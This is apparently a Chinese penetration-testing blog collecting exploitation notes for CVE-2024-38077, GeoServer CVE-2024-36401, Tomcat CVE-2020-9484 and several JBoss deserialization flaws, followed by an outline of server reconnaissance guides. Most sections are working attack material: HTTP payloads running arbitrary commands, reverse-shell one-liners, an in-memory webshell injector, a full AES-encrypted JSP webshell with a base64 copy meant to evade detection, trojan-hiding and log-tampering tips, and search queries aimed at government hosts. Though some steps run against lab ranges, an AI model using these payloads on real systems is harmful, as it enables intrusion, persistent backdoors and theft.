1echo "test" >> test.txt
2cd C:\Users\Administrator\Desktop\
3test.exe

删除原有bat文件，put上去新bat文件和木马 test.exe 文件

Kali中用msfconsle起5252端口

APT案例(新闻行业APT组织攻击与木马分析溯源)

lsof -p 5386

检查端口文件，如果木马被删了可以从proc里面找。对应PID号文件夹里的exe就是打开的木马文件，在进程里的，除非重启。

echo改掉日志文件才能完全隐藏木马痕迹。

升级方向

流量加密
sh和socket分离
客户端改成被动式激活，减少流量

【POC未成功控制】Windows 远程桌面授权服务远程代码执行漏洞 CVE-2024-38077 漏洞狂躁许可（MadLicense）

Thu, 15 Aug 2024 16:43:45 +0000

参考链接 Windows 远程桌面授权服务远程代码执行漏洞(CVE-2024-38077) Windows 远程桌面授权服务远程代码执行漏洞关于Windows远程桌面许可服务存在远程代码执行漏洞的安全公告微软高危漏洞 CVE-2024-38077 EXP CVE-2024-38077-EXP 漏洞预警 | 已复现】Windows 远程桌面授权服务远程代码执行漏洞（CVE-2024-38077）附POC

漏洞影响的产品和版本

 1Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)
 2Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)
 3Windows Server 2008 R2 for x64-based Systems Service Pack 1
 4Windows Server 2008 R2 for x64-based Systems Service Pack 1
 5Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation)
 6Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation)
 7Windows Server 2008 for x64-based Systems Service Pack 2
 8Windows Server 2008 for x64-based Systems Service Pack 2
 9Windows Server 2008 for 32-bit Systems Service Pack 2 (Server Core installation)
10Windows Server 2008 for 32-bit Systems Service Pack 2 (Server Core installation)
11Windows Server 2008 for 32-bit Systems Service Pack 2
12Windows Server 2008 for 32-bit Systems Service Pack 2
13Windows Server 2012 R2 (Server Core installation)
14Windows Server 2012 R2
15Windows Server 2012 (Server Core installation)
16Windows Server 2012
17Windows Server 2016 (Server Core installation)
18Windows Server 2016
19Windows Server 2019 (Server Core installation)
20Windows Server 2019
21Windows Server 2022, 23H2 Edition (Server Core installation)
22Windows Server 2022 (Server Core installation)
23Windows Server 2022
24Windows Server 2025 Preview

用法

靶场搭建

开一个普通的Windows Server 2012 R2 数据中心版 64位中文版服务器。

打开服务器管理器。在命令提示符（cmd）中输入 “servermanager” 命令打开 “服务器管理器”。

添加角色和功能。点击 “添加” ，然后弹出角色和功能向导。默认点击下一步到 “服务器角色” 功能。添加 “远程桌面服务”。选择后默认下一步进行安装，直到显示 “角色服务” 。在这里选择 “远程桌面授权” ，然后点击 “安装” 。安装过程可能需要等待1-2分钟。

安装完成后需要手动开启服务。在命令提示符（cmd）中输入 “services.msc” 命令，成功打开 “服务” 窗口，找到 “Remote Procedure Call (RPC) Locator” 点击开启RPC服务即可完成。

搜索语法

ZoomEye搜索

1"3d267954-eeb7-11d1-b94e-00c04fa3080d"
2"3d267954-eeb7-11d1-b94e-00c04fa3080d" + country:"CN"

Hunter搜索

1ip.ports="3389" && ip.ports="135" && icp.is_exception="true"
2ip.ports="135"&&icp.is_exception="true"&&icp.name="政府"

检测

方法一：下载深信服CVE-2024-38077漏洞扫描工具.exe，使用命令.\深信服CVE-2024-38077漏洞扫描工具.exe 49.235.229.3 检查目标是否存在该漏洞。

方法二：下载利用工具CVE-2024-38077-EXP

1python CVE-2024-38077-POC.py --target_ip 靶机IP

利用

1options:
2 -h, --help show this help message and exit
3 --target_ip TARGET_IP
4 Target IP, eg: 192.168.120.1
5 --evil_ip EVIL_IP Evil IP, eg: 192.168.120.2
6 --evil_dll_path EVIL_DLL_PATH
7 Evil dll path, eg: \smb\evil_dll.dll
8 --check_vuln_exist CHECK_VULN_EXIST
9 Check vulnerability exist before exploit

有一个公众号复现视频模糊的背景看出似乎要CS？

cobaltstrike-client的使用

CobaltStrike使用教程详解（基础）

下载CS4.8，解压密码mht。

CS需要一个CS服务器，一个控制机（攻击机），被控机（靶机）。首先在CS服务器上安装java11，然后设置权限全部可执行，设置密码启动。

1推荐使用ubuntu18运行
2sudo apt install openjdk-11-jre-headless
3sudo apt install openjdk-11-jdk
4chmod 777 teamserver
5chmod 777 TeamServerImage
6./teamserver CS服务器公网IP passwd

在控制机上cobaltstrike-client也是需要Java11才能启动。

1java -XX:ParallelGCThreads=4 -XX:+AggressiveHeap -XX:+UseParallelGC -javaagent:uHook.jar -Dfile.encoding=utf-8 -jar cobaltstrike-client.jar

输入之前设置的主机ip和密码就可以，端口默认。

执行多次不成功，看报错提示似乎还需要一个dll文件。后台翻Github发现POC仅针对2025，好好好好，这么玩是吧，什么垃圾。

总结评价

没啥用了的噱头很大的鸡肋漏洞，漏洞本身价值很大，但是防守应急处置手段太过简单，没有沉没代价，只要封一个135端口就行，基本不影响业务。默认情况下，Windows服务器远程桌面服务仅支持两个并发会话，在启用RDP多并发会话支持时，需要手动安装RDL服务。不排除还有未更新的和未关闭端口的服务，总之是看谁手速快了。

我现在因为复现失败很狂躁，不愧是狂躁许可（MadLicense），真是让人狂躁。

GeoServer CVE-2024-36401 漏洞利用

Tue, 13 Aug 2024 15:02:58 +0000

搜索语法

app.name=“GeoServer” and ip.country=“CN” and icp.is_exception=“true”

版本属性

在GeoServer 2.25.1， 2.24.3， 2.23.5版本及以前，未登录的任意用户可以通过构造恶意OGC请求，在默认安装的服务器中执行XPath表达式，进而利用执行Apache Commons Jxpath提供的功能执行任意代码。GeoServer 是 OpenGIS Web 服务器规范的 J2EE 实现，利用 GeoServer 可以方便的发布地图数据，允许用户对特征数据进行更新、删除、插入操作。

靶场环境

建议开一个美国区的云服务器，拉取GitHub和Vulhub方便。

1git clone https://github.com/vulhub/vulhub.git
2cd vulhub/
3cd geoserver/CVE-2024-36401/
4docker-compose up -d

访问 http://your-ip:8080/geoserver 查看到GeoServer的默认页面。

POC

GET方法的POC

1GET /geoserver/wfs?service=WFS&version=2.0.0&request=GetPropertyValue&typeNames=sf:archsites&valueReference=exec(java.lang.Runtime.getRuntime(),'touch%20/tmp/success1') HTTP/1.1
2Host: your-ip:8080
3Accept-Encoding: gzip, deflate, br
4Accept: */*
5Accept-Language: en-US;q=0.9,en;q=0.8
6User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.6367.118 Safari/537.36
7Connection: close
8Cache-Control: max-age=0

进入容器查看，可以看到成功创建文件。

1docker exec -it cve-2024-36401_web_1 /bin/bash
2ls /tmp

基于POST方法的POC

 1POST /geoserver/wfs HTTP/1.1
 2Host: your-ip:8080
 3Accept-Encoding: gzip, deflate, br
 4Accept: */*
 5Accept-Language: en-US;q=0.9,en;q=0.8
 6User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.6367.118 Safari/537.36
 7Connection: close
 8Cache-Control: max-age=0
 9Content-Type: application/xml
10Content-Length: 356
11
12<wfs:GetPropertyValue service='WFS' version='2.0.0'
13 xmlns:topp='http://www.openplans.org/topp'
14 xmlns:fes='http://www.opengis.net/fes/2.0'
15 xmlns:wfs='http://www.opengis.net/wfs/2.0'>
16 <wfs:Query typeNames='sf:archsites'/>
17 <wfs:valueReference>exec(java.lang.Runtime.getRuntime(),'touch /tmp/success2')</wfs:valueReference>
18</wfs:GetPropertyValue>

只有 ows:ExceptionReport java.lang.ClassCastException: 的报错是成功执行的。

值得注意的是，typeNames必须存在，我们可以在Web页面中找到当前服务器中的所有Types

DNS 反弹测试

 1POST /geoserver/wfs HTTP/1.1
 2Host:47.251.97.142:8080
 3Accept-Encoding:gzip,deflate,br
 4Accept:*/*
 5Accept-Language:en-US;q=0.9,en;q=0.8
 6User-Agent:Mozilla/5.0(WindowsNT10.0;Win64;x64)AppleWebKit/537.36(KHTML,likeGecko)Chrome/124.0.6367.118Safari/537.36
 7Connection:close
 8Cache-Control:max-age=0
 9Content-Type:application/xml
10Content-Length: 358
11
12<wfs:GetPropertyValue service='WFS' version='2.0.0'
13 xmlns:topp='http://www.openplans.org/topp'
14 xmlns:fes='http://www.opengis.net/fes/2.0'
15 xmlns:wfs='http://www.opengis.net/wfs/2.0'>
16 <wfs:Query typeNames='sf:archsites'/>
17 <wfs:valueReference>exec(java.lang.Runtime.getRuntime(),'curl 5s1mc4.dnslog.cn')</wfs:valueReference>
18</wfs:GetPropertyValue>

武器化利用

反弹Shell

反弹shell在线生成器在线生成一句话反弹命令

1echo "sh -i >& /dev/tcp/攻击机ip/攻击机端口 0>&1" |base64
2nc -lvnp 7777 # 攻击机开启监听端口

 1POST /geoserver/wfs HTTP/1.1
 2Host:47.251.97.142:8080
 3Accept-Encoding:gzip,deflate,br
 4Accept:*/*
 5Accept-Language:en-US;q=0.9,en;q=0.8
 6User-Agent:Mozilla/5.0(WindowsNT10.0;Win64;x64)AppleWebKit/537.36(KHTML,likeGecko)Chrome/124.0.6367.118Safari/537.36
 7Connection:close
 8Cache-Control:max-age=0
 9Content-Type:application/xml
10Content-Length: 432
11
12<wfs:GetPropertyValue service='WFS' version='2.0.0'
13 xmlns:topp='http://www.openplans.org/topp'
14 xmlns:fes='http://www.opengis.net/fes/2.0'
15 xmlns:wfs='http://www.opengis.net/wfs/2.0'>
16 <wfs:Query typeNames='sf:archsites'/>
17 <wfs:valueReference>exec(java.lang.Runtime.getRuntime(),'bash -c {echo,反弹的base64编码}|{base64,-d}|{bash,-i}')</wfs:valueReference>
18</wfs:GetPropertyValue>

注意 Content-Length:357 中数字的长度要和命令的字节数等于或大于才能执行成功，越大执行越慢。

注入内存木马

使用JMG工具生成内存马，注意名写 java.lang.tes，自定义密码密钥点击生成。把输出复制到下面的POC里 str="内存马base64";的位置。

 1POST /geoserver/wfs HTTP/1.1
 2Host: 47.251.97.142:8080
 3Accept-Encoding: gzip,deflate,br
 4Accept: */*
 5Accept-Language:en-US;q=0.9,en;q=0.8
 6User-Agent: Mozilla/5.0(WindowsNT10.0;Win64;x64)AppleWebKit/537.36(KHTML,likeGecko)Chrome/124.0.6367.118Safari/537.36
 7Connection: close
 8Cache-Control: max-age=0
 9Content-Type: application/xml
10Content-Length: 432
11
12<wfs:GetPropertyValue service='WFS' version='2.0.0'
13 xmlns:topp='http://www.openplans.org/topp'
14 xmlns:fes='http://www.opengis.net/fes/2.0'
15 xmlns:wfs='http://www.opengis.net/wfs/2.0'>
16 <wfs:Query typeNames='sf:archsites'/>
17 <wfs:valueReference>eval(getEngineByName(javax.script.ScriptEngineManager.new(),'js'),'
18var str="";
19var bt;
20try {
21 bt = java.lang.Class.forName("sun.misc.BASE64Decoder").newInstance().decodeBuffer(str);
22} catch (e) {
23 bt = java.util.Base64.getDecoder().decode(str);
24}
25var theUnsafe = java.lang.Class.forName("sun.misc.Unsafe").getDeclaredField("theUnsafe");
26theUnsafe.setAccessible(true);
27unsafe = theUnsafe.get(null);
28unsafe.defineAnonymousClass(java.lang.Class.forName("java.lang.Class"), bt, null).newInstance();
29')</wfs:valueReference>
30</wfs:GetPropertyValue>

POC有问题，不成功，建议使用反弹shell后再用别的工具建立探针控制。

工具批量监测

1git clone https://mirror.ghproxy.com/https://github.com/RevoltSecurities/CVE-2024-36401.git
2cd CVE-2024-36401/
3pip install -r requirements.txt -i https://pypi.tuna.tsinghua.edu.cn/simple some-package
4python exploit.py -l geoserverip.txt

参考链接 https://mp.weixin.qq.com/s/h4oswTGGaxVBLXR_h7PT1Q https://cloud.tencent.com/developer/article/2437213 https://github.com/vulhub/vulhub/blob/master/geoserver/CVE-2024-36401/README.zh-cn.md https://github.com/pen4uin/java-memshell-generator https://xz.aliyun.com/t/14991?time__1311=GqAh0IqGxmxfx0v44%2BxCqqQwwbugt03x https://github.com/RevoltSecurities/CVE-2024-36401 https://yzddmr6.com/posts/geoserver-memoryshell/ https://cn-sec.com/archives/2997415.html

CVE-2022-9484 Apache Tomcat Session 漏洞利用

Thu, 08 Aug 2024 16:13:45 +0000

配置靶场

拉取靶场环境。

1docker pull vulfocus/tomcat-cve_2020_9484
2docker run -d --name tomcat-cve_2020_9484 -p 8080:8080 vulfocus/tomcat-cve_2020_9484:latest

Docker 拉取镜像太慢换源

 1sudo mkdir -p /etc/docker
 2sudo tee /etc/docker/daemon.json <<-'EOF'
 3{
 4 "registry-mirrors": [
 5 "https://yxzrazem.mirror.aliyuncs.com",
 6 "https://registry.docker-cn.com",
 7 "https://docker.mirrors.ustc.edu.cn",
 8 "https://hub-mirror.c.163.com",
 9 "https://mirror.baidubce.com"
10 ]
11}
12EOF
13sudo systemctl daemon-reload
14sudo systemctl restart docker

https://yxzrazem.mirror.aliyuncs.com 这个镜像非常快，推荐使用。

Docker 常用命令

 1# 拉取镜像
 2docker pull tomcat:jdk8-openjdk 
 3docker pull tomcat:8.5.55-jdk8-openjdk
 4# 查看镜像
 5docker images 
 6# 进入容器, 当前目录还是在tomcat镜像生成的容器目录下，可以使用:ctrl+p+q不退出容器的方式返回到宿主机目录下
 7docker exec -it f8ca37b5df5d /bin/bash
 8#出容器
 9ctrl+p+q
10# 使用:ctrl+p+q不退出容器的方式返回到宿主机目录下
11# 重启容器
12docker restart 容器ID
13docker restart 31290cf1cc00
14# 停止容器
15docker stop 容器id
16docker stop 31290cf1cc00
17# 启动一个已经停止的容器实例
18docker start 容器名称 或者 容器id tomcat_contract
19docker start 31290cf1cc00
20# 删除容器,可使用 -f 参数强制删除容器
21docker rm 31290cf1cc00
22# 查看所有的容器
23docker ps -a 
24# 查看运行中的容器
25docker ps 
26# 运行镜像
27docker run -d --name tomcat_test -p 8088:8080 7254ff7719c0
28docker run -d --name tomcat_test -v /etc/localtime:/etc/localtime -p 2080:8080 tomcat:latest
29# 保存镜像成一个文件。
30docker save -o tomcat-8.5.55-jdk8-openjdk-dev-v0.1.tar tomcat-8.5.55-jdk8-openjdk-dev:v0.1
31# 从容器拷贝文件到宿主机
32docker load < hangge_server.tar
33# docker cp 容器名：容器中要拷贝的文件名及其路径 要拷贝到宿主机里面对应的路径,拷贝容器中 tomcat的conf目录 到 宿主机 的 home/tomcat 目录下
34docker cp 827e39c506b1:/usr/local/tomcat/conf /home/tomcat_contract/
35# 拷贝容器中 tomcat的webapps目录 到 宿主机 的 home/tomcat 目录下
36docker cp 827e39c506b1:/usr/local/tomcat/webapps /home/tomcat_contract/
37# 删除images, 使用 docker load 命令则可将这个镜像文件载入进来。
38docker rmi 6e07337dc2a2

Groovy 执行漏洞

测试（在Docker中）

BurpSuit 抓包，修改请求头，添加Cookie: redirect=1; JSESSIONID=../../../../../usr/local/tomcat/groovy，就能读到主目录下的文件。

靶机上tmp目录生成了rce，存在漏洞。

Payload构造（在攻击机上）

生成payload，最好在目标靶机同系统的Linux上。

下载ysoserial漏洞利用工具，如果下载失败，上官网clone项目，然后apt install maven安装包构建工具，再在ysoserial主目录下mvn clean package -DskipTests生成jar包。

使用方法

1java -jar ysoserial-0.0.6-SNAPSHOT-all.jar Groovy1 "touch /tmp/2333" > /tmp/test.session

在本机目录下生成了test.session文件。文件内容是包含"touch /tmp/2333"命令的。

使用以下命令网文tomcat服务

1curl 'http://127.0.0.1:8080/index.jsp' -H 'Cookie: JSESSIONID=../../../../../tmp/test'

总结注意

Groovy示例代码和test说明了，需要目标靶机存在可以被攻击机上上传修改内容的test.seesion的文件，或者攻击机通过别的方式写入session文件，知道session可以访问的路径再请求。可用于tomcat文件上传漏洞中被限制了上传jsp后缀内容的绕过。

进阶利用

生成jsp木马，将木马文件放到可访问的目录下，冰蝎或哥斯拉链接。JSP内容如下：

1<%! String xc="3c6e0b8a9c15224a"; class X extends ClassLoader{public X(ClassLoader z){super(z);}public Class Q(byte[] cb){return super.defineClass(cb, 0, cb.length);} }public byte[] x(byte[] s,boolean m){ try{javax.crypto.Cipher c=javax.crypto.Cipher.getInstance("AES");c.init(m?1:2,new javax.crypto.spec.SecretKeySpec(xc.getBytes(),"AES"));return c.doFinal(s); }catch (Exception e){return null; }}%><%try{byte[] data=new byte[Integer.parseInt(request.getHeader("Content-Length"))];java.io.InputStream inputStream= request.getInputStream();int _num=0;while ((_num+=inputStream.read(data,_num,data.length))<data.length);data=x(data, false);if (session.getAttribute("payload")==null){session.setAttribute("payload",new X(this.getClass().getClassLoader()).Q(data));}else{request.setAttribute("parameters", data);Object f=((Class)session.getAttribute("payload")).newInstance();java.io.ByteArrayOutputStream arrOut=new java.io.ByteArrayOutputStream();f.equals(arrOut);f.equals(pageContext);f.toString();response.getOutputStream().write(x(arrOut.toByteArray(), true));} }catch (Exception e){}%>

将其编码为base64，这样就没有括号双引号等干扰，也可绕过一些检测。

1PCUhIFN0cmluZyB4Yz0iM2M2ZTBiOGE5YzE1MjI0YSI7IGNsYXNzIFggZXh0ZW5kcyBDbGFzc0xvYWRlcntwdWJsaWMgWChDbGFzc0xvYWRlciB6KXtzdXBlcih6KTt9cHVibGljIENsYXNzIFEoYnl0ZVtdIGNiKXtyZXR1cm4gc3VwZXIuZGVmaW5lQ2xhc3MoY2IsIDAsIGNiLmxlbmd0aCk7fSB9cHVibGljIGJ5dGVbXSB4KGJ5dGVbXSBzLGJvb2xlYW4gbSl7IHRyeXtqYXZheC5jcnlwdG8uQ2lwaGVyIGM9amF2YXguY3J5cHRvLkNpcGhlci5nZXRJbnN0YW5jZSgiQUVTIik7Yy5pbml0KG0/MToyLG5ldyBqYXZheC5jcnlwdG8uc3BlYy5TZWNyZXRLZXlTcGVjKHhjLmdldEJ5dGVzKCksIkFFUyIpKTtyZXR1cm4gYy5kb0ZpbmFsKHMpOyB9Y2F0Y2ggKEV4Y2VwdGlvbiBlKXtyZXR1cm4gbnVsbDsgfX0lPjwldHJ5e2J5dGVbXSBkYXRhPW5ldyBieXRlW0ludGVnZXIucGFyc2VJbnQocmVxdWVzdC5nZXRIZWFkZXIoIkNvbnRlbnQtTGVuZ3RoIikpXTtqYXZhLmlvLklucHV0U3RyZWFtIGlucHV0U3RyZWFtPSByZXF1ZXN0LmdldElucHV0U3RyZWFtKCk7aW50IF9udW09MDt3aGlsZSAoKF9udW0rPWlucHV0U3RyZWFtLnJlYWQoZGF0YSxfbnVtLGRhdGEubGVuZ3RoKSk8ZGF0YS5sZW5ndGgpO2RhdGE9eChkYXRhLCBmYWxzZSk7aWYgKHNlc3Npb24uZ2V0QXR0cmlidXRlKCJwYXlsb2FkIik9PW51bGwpe3Nlc3Npb24uc2V0QXR0cmlidXRlKCJwYXlsb2FkIixuZXcgWCh0aGlzLmdldENsYXNzKCkuZ2V0Q2xhc3NMb2FkZXIoKSkuUShkYXRhKSk7fWVsc2V7cmVxdWVzdC5zZXRBdHRyaWJ1dGUoInBhcmFtZXRlcnMiLCBkYXRhKTtPYmplY3QgZj0oKENsYXNzKXNlc3Npb24uZ2V0QXR0cmlidXRlKCJwYXlsb2FkIikpLm5ld0luc3RhbmNlKCk7amF2YS5pby5CeXRlQXJyYXlPdXRwdXRTdHJlYW0gYXJyT3V0PW5ldyBqYXZhLmlvLkJ5dGVBcnJheU91dHB1dFN0cmVhbSgpO2YuZXF1YWxzKGFyck91dCk7Zi5lcXVhbHMocGFnZUNvbnRleHQpO2YudG9TdHJpbmcoKTtyZXNwb25zZS5nZXRPdXRwdXRTdHJlYW0oKS53cml0ZSh4KGFyck91dC50b0J5dGVBcnJheSgpLCB0cnVlKSk7fSB9Y2F0Y2ggKEV4Y2VwdGlvbiBlKXt9JT4=

构造payload，

1java -jar ysoserial-all.jar Groovy1 "echo PCUhIFN0cmluZyB4Yz0iM2M2ZTBiOGE5YzE1MjI0YSI7IGNsYXNzIFggZXh0ZW5kcyBDbGFzc0xvYWRlcntwdWJsaWMgWChDbGFzc0xvYWRlciB6KXtzdXBlcih6KTt9cHVibGljIENsYXNzIFEoYnl0ZVtdIGNiKXtyZXR1cm4gc3VwZXIuZGVmaW5lQ2xhc3MoY2IsIDAsIGNiLmxlbmd0aCk7fSB9cHVibGljIGJ5dGVbXSB4KGJ5dGVbXSBzLGJvb2xlYW4gbSl7IHRyeXtqYXZheC5jcnlwdG8uQ2lwaGVyIGM9amF2YXguY3J5cHRvLkNpcGhlci5nZXRJbnN0YW5jZSgiQUVTIik7Yy5pbml0KG0/MToyLG5ldyBqYXZheC5jcnlwdG8uc3BlYy5TZWNyZXRLZXlTcGVjKHhjLmdldEJ5dGVzKCksIkFFUyIpKTtyZXR1cm4gYy5kb0ZpbmFsKHMpOyB9Y2F0Y2ggKEV4Y2VwdGlvbiBlKXtyZXR1cm4gbnVsbDsgfX0lPjwldHJ5e2J5dGVbXSBkYXRhPW5ldyBieXRlW0ludGVnZXIucGFyc2VJbnQocmVxdWVzdC5nZXRIZWFkZXIoIkNvbnRlbnQtTGVuZ3RoIikpXTtqYXZhLmlvLklucHV0U3RyZWFtIGlucHV0U3RyZWFtPSByZXF1ZXN0LmdldElucHV0U3RyZWFtKCk7aW50IF9udW09MDt3aGlsZSAoKF9udW0rPWlucHV0U3RyZWFtLnJlYWQoZGF0YSxfbnVtLGRhdGEubGVuZ3RoKSk8ZGF0YS5sZW5ndGgpO2RhdGE9eChkYXRhLCBmYWxzZSk7aWYgKHNlc3Npb24uZ2V0QXR0cmlidXRlKCJwYXlsb2FkIik9PW51bGwpe3Nlc3Npb24uc2V0QXR0cmlidXRlKCJwYXlsb2FkIixuZXcgWCh0aGlzLmdldENsYXNzKCkuZ2V0Q2xhc3NMb2FkZXIoKSkuUShkYXRhKSk7fWVsc2V7cmVxdWVzdC5zZXRBdHRyaWJ1dGUoInBhcmFtZXRlcnMiLCBkYXRhKTtPYmplY3QgZj0oKENsYXNzKXNlc3Npb24uZ2V0QXR0cmlidXRlKCJwYXlsb2FkIikpLm5ld0luc3RhbmNlKCk7amF2YS5pby5CeXRlQXJyYXlPdXRwdXRTdHJlYW0gYXJyT3V0PW5ldyBqYXZhLmlvLkJ5dGVBcnJheU91dHB1dFN0cmVhbSgpO2YuZXF1YWxzKGFyck91dCk7Zi5lcXVhbHMocGFnZUNvbnRleHQpO2YudG9TdHJpbmcoKTtyZXNwb25zZS5nZXRPdXRwdXRTdHJlYW0oKS53cml0ZSh4KGFyck91dC50b0J5dGVBcnJheSgpLCB0cnVlKSk7fSB9Y2F0Y2ggKEV4Y2VwdGlvbiBlKXt9JT4= | base64 -d > /usr/local/tomcat/webapps/ROOT/passkeybase64d.jsp" > passkeybase64d.session

注意/usr/local/tomcat/webapps/ROOT/ 为本次演示靶机的tomcat运行目录，tomcat8080页面运行目录一般在/webapps/ROOT/下，请注意路径可访问。演示时上传成功后不会执行，存在问题。

武器化

在可以运行Java8的攻击机上运行以下命令，已经添加了代理访问Github快速。

1cd /opt && git clone https://mirror.ghproxy.com/https://github.com/frohoff/ysoserial
2
3cd /opt/ysoserial && wget https://mirror.ghproxy.com/https://github.com/frohoff/ysoserial/releases/download/v0.0.6/ysoserial-all.jar -O ysoserial-master.jar
4
5cd /opt && git clone https://mirror.ghproxy.com/https://github.com/PenTestical/CVE-2020-9484 && cd CVE-2020-9484/ && chmod +x CVE-2020-9484.sh

1vim CVE-2020-9484.sh # remote_ip="10.10.15.108" 你的攻击机公网ip # change this
2nc -nvlp 4444
3cd /tmp && python3 -m http.server 80
4./CVE-2020-9484.sh target-ip

这个利用的是上传漏洞，要有上传页面，upload.jsp。

参考链接

样例目录Session泄露

很鸡肋 </examples/servlets/servlet/SessionExample> 目录下有session会话模板，可以利用。

参考链接

https://saucer-man.com/information_security/507.html

https://blog.csdn.net/qq_48985780/article/details/121421440

Jobss漏洞 CVE-2017-12149 CVE-2015-7501 CVE-2017-7504

Thu, 08 Aug 2024 16:13:45 +0000

jboss 代码执行 (CVE-2017-12149)

影响范围

1JBoss 5.x/6.x

漏洞原理

在/invoker/readonly路径下，攻击者可以构造序列化代码传入服务器进行反序列化,由于没有对反序列化操作进行任何检测，导致攻击者可以执行任意代码该漏洞位于JBoss的HttpInvoker组件中的 ReadOnlyAccessFilter 过滤器中，其doFilter方法在没有进行任何安全检查和限制的情况下尝试将来自客户端的序列化数据流进行反序列化，导致攻击者可以通过精心设计的序列化数据来执行任意代码

漏洞复现

启动 https://vulfocus.cn/ 靶场环境

访问 /invoker/readonly 如果返回500，说明此页面就可能存在反序列化漏洞。

直接用CVE工具利用

靶场 flag-{bmh7cbffb27-ed9a-4c74-8929-0b6df905cc8a}

反弹shell的POC

下载工具后进入目录http://scan.javasec.cn/java/JavaDeserH2HC.zip

攻击机下载执行执行生成二进制payload文件：

1javac -cp .:commons-collections-3.2.1.jar ReverseShellCommonsCollectionsHashMap.java

修改接收shell的IP和端口：

1java -cp .:commons-collections-3.2.1.jar ReverseShellCommonsCollectionsHashMap 攻击机IP:7777

不要管报错

NC开启监听：

1nc -vv -l -p 7777

向靶机发起攻击Payload：

1curl http://123.58.224.8:26968/invoker/readonly --data-binary @ReverseShellCommonsCollectionsHashMap.ser

反弹成功

取得flag

JBoss JMXInvokerServlet 反序列化漏洞（CVE-2015-7501）

影响版本

 1Red Hat JBoss A-MQ 6.x版本；
 2BPM Suite (BPMS) 6.x版本；
 3BRMS 6.x版本和5.x版本；
 4Data Grid (JDG) 6.x版本；
 5Data Virtualization (JDV) 6.x版本和5.x版本；
 6Enterprise Application Platform 6.x版本，5.x版本和4.3.x版本；
 7Fuse 6.x版本；
 8Fuse Service Works (FSW) 6.x版本；
 9Operations Network (JBoss ON) 3.x版本；
10Portal 6.x版本；
11SOA Platform (SOA-P) 5.x版本；
12Web Server (JWS) 3.x版本；
13Red Hat OpenShift/xPAAS 3.x版本；
14Red Hat Subscription Asset Manager 1.3版本。

漏洞原理1

JBoss在 /invoker/JMXInvokerServlet 请求中读取了用户传入的对象，然后我们可以利用 Apache Commons Collections 中的 Gadget 执行任意代码。

漏洞复现1

如果嫩下载JMXInvokerServlet文件就存在漏洞。

1git clone https://github.com/ianxtianxt/CVE-2015-7501/
2cd CVE-2015-7501/
3javac -cp .:commons-collections-3.2.1.jar ReverseShellCommonsCollectionsHashMap.java
4java -cp .:commons-collections-3.2.1.jar ReverseShellCommonsCollectionsHashMap 攻击机IP:7777
5nc -vv -l -p 7777
6curl http://123.58.224.8:55153/invoker/readonly --data-binary @ReverseShellCommonsCollectionsHashMap.ser

_flag=flag-{bmh30a69994-5535-4de1-b53d-5c36c0d0498e}

JBoss EJBInvokerServlet 反序列化漏洞

跟CVE-2015-7501利⽤⽅法⼀样，只是路径不⼀样，这个漏洞利⽤路径是

/invoker/EJBInvokerServlet

JBossMQJMS 反序列化漏洞（CVE-2017-7504）

影响版本2

JBoss <=4.x

漏洞原理2

JbossMQ实现过程的JMS over HTTP Invocation Layer的HTTPServerILServlet.java文件存在反序列化漏洞，远程攻击者可借助特制的序列化数据利用该漏洞执行任意代码。

漏洞复现2

访问 /jbossmq-httpil/HTTPServerILServlet 返回This is the JBossMQ HTTP-IL，说明存在反序列化漏洞。

利用工具:JavaDeserH2HC

https://github.com/joaomatosf/JavaDeserH2HC

1javac -cp .:commons-collections-3.2.1.jar ReverseShellCommonsCollectionsHashMap.java
2java -cp .:commons-collections-3.2.1.jar ReverseShellCommonsCollectionsHashMap 攻击机:7777
3nc -vv -l -p 7777
4curl http://123.58.224.8:47973/jbossmq-httpil/HTTPServerILServlet --data-binary @ReverseShellCommonsCollectionsHashMap.ser

flag-{bmh93d53260-14f8-4405-91cd-f4221ef65f3f}

Jexboss 工具一键植入

1python jexboss.py -u http://123.58.224.8:47973/

特殊情况

Windows主机无法反弹shell。

参考链接

https://mp.weixin.qq.com/s/IVVftRRofmGQaE52m4SAyQ

漏洞利用 on 静静的安全笔记

Linux服务器端口和基本信息侦察指南

Linux服务器端口和基本信息侦察指南

1. 基础系统信息文件

1.1. /etc/services

1.2. /etc/hosts

1.3. /etc/hostname

1.4. /etc/resolv.conf

2. 网络连接和端口信息

2.1. /proc/net/tcp 和 /proc/net/udp

2.2. /proc/net/tcp6 和 /proc/net/udp6

2.3. /proc/net/unix

2.4. 运行时进程信息

3. 网络配置文件

3.1. RHEL/CentOS 网络配置

3.2. Debian/Ubuntu 网络配置

3.3. 网络接口系统信息

4. 超级服务器配置

4.1. /etc/inetd.conf 或 /etc/xinetd.conf

5. Web服务器配置

5.1. Nginx 配置

5.2. Apache 配置

6. 数据库服务配置

6.1. MySQL/MariaDB

6.2. PostgreSQL

6.3. Redis

6.4. MongoDB

7. 其他网络服务配置

7.1. SSH 配置

7.2. FTP 服务

7.3. Samba

8. 防火墙配置

8.1. iptables

8.2. ufw (Uncomplicated Firewall)

8.3. firewalld

9. Systemd 服务管理

9.1. Systemd 服务文件

10. 容器和虚拟化

10.1. Docker

10.2. Kubernetes 配置

10.3. 云提供商元数据服务

11. 系统日志文件

12. 安全策略配置

12.1. SELinux

12.2. AppArmor

13. 定时任务

13.1. Cron 任务

14. 应用程序特定配置

14.1. Java 应用

14.2. Node.js 应用

14.3. Python 应用

15. 如何利用这些文件和服务获取信息

15.1. 手动查看

15.1.1. 查看进程

15.1.2. 查看监听端口

15.1.3. 查看打开的文件和网络连接

15.2. 自动化工具

15.3. Web 服务器信息泄露

安全建议

Windows服务器端口和基本信息侦察指南

1. 系统基本信息

1.1. 主机名和网络配置

1.1.1. 计算机名称

1.1.2. Hosts 文件

1.1.3. Networks 文件

1.1.4. Services 文件

2. 注册表中的网络配置

2.1. TCP/IP 配置

2.2. 网络接口配置

2.3. 端口代理配置

3. Windows防火墙配置

3.1. 防火墙规则

3.2. Windows Defender 防火墙配置文件

4. IIS (Internet Information Services) 配置

4.1. IIS 配置文件

4.2. IIS 日志文件

5. 远程桌面服务 (RDP)

5.1. RDP 配置

6. 数据库服务配置

6.1. Microsoft SQL Server

1.1. `/etc/services`

1.2. `/etc/hosts`

1.3. `/etc/hostname`

